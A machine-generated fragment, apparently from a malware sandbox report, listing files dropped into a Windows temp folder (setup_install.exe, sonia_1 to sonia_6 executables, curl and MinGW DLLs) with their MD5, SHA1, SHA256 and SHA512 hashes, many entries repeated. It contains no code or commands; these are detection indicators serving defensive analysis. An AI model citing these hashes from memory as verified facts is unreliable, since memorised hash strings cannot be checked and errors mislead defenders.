                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_2.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_2.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_3.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_3.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_4.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_4.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_5.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_5.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_6.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_6.txt
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        74231678f536a19b3016840f56b845c7

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\libcurl.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\libcurlpp.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\libstdc++-6.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\libwinpthread-1.dll
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\setup_install.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_1.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_2.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_2.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_2.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_2.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_3.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                                                      • \Users\Admin\AppData\Local\Temp\7zS0C5F7CF4\sonia_3.exe
                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

